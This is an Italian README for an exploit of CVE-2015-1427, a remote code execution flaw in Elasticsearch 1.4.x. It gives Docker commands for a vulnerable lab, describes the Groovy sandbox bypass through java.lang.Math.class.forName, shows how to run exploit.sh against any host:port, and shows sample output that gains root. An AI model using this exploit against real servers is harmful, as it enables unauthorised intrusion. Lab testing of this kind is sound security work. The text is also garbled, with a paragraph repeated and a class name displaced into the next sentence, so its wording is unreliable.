
Elasticsearch 1.4.0 < 1.4.2 Exploit per esecuzione di codice remoto e container vulnerabile
Elasticsearch è un motore di ricerca e analisi distribuito e RESTful in grado di risolvere un numero crescente di casi d'uso. Come cuore dello Elastic Stack, memorizza centralmente i tuoi dati così da poter scoprire l'atteso e rivelare l'inaspettato.
Per configurare un ambiente vulnerabile per il tuo test avrai bisogno di Docker installato, e basta eseguire il seguente comando:
docker build -t vuln/cve-2015-1427 .
docker run --rm -it -p 9200:9200 vuln/cve-2015-1427
E genererà un'applicazione web vulnerabile sul tuo host sulla porta 9200
Il bug si trova nell'API REST, che non richiede autenticazione, dove la funzione di ricerca permette l'esecuzione di codice groovy e la sua sandbox può essere aggirata usando java.lang.Math.class.forName per fare riferimento a classi arbitrarie. Può essere usato per eseguire codice Java arbitrario. Il bug si trova nell'API REST, che non richiede autenticazione, dove la funzione di ricerca permette l'esecuzione di codice groovy e la sua sandbox può essere aggirata usando per fare riferimento a classi arbitrarie. Può essere usato per eseguire codice Java arbitrario.
java.lang.Math.class.forNamePer sfruttare questo target basta eseguire:
./exploit.sh host:port
Se stai usando questa immagine vulnerabile, puoi semplicemente eseguire:
./exploit.sh 127.0.0.1:9200
[+] CVE-2015-1427 exploit by t0kx
[+] Exploiting 127.0.0.1:9200
[+] Trigger Payload...
[+] Running whoami: root
[+] Done
Questa falla è stata trovata dal Cisco Systems Information Security Team e da Cameron Morris.
Questo programma o i precedenti sono solo a scopo EDUCATIVO. Non utilizzarlo senza autorizzazione. Si applica la consueta dichiarazione di non responsabilità, in particolare il fatto che io (t0kx) non sono responsabile per eventuali danni causati dall'uso diretto o indiretto delle informazioni o funzionalità fornite da questi programmi. L'autore o qualsiasi fornitore di servizi Internet non si assume ALCUNA responsabilità per il contenuto o l'uso improprio di questi programmi o di loro derivati. Utilizzando questi programmi accetti che qualsiasi danno (perdita di dati, crash di sistema, compromissione del sistema, ecc.) causato dall'uso di questi programmi non è responsabilità di t0kx.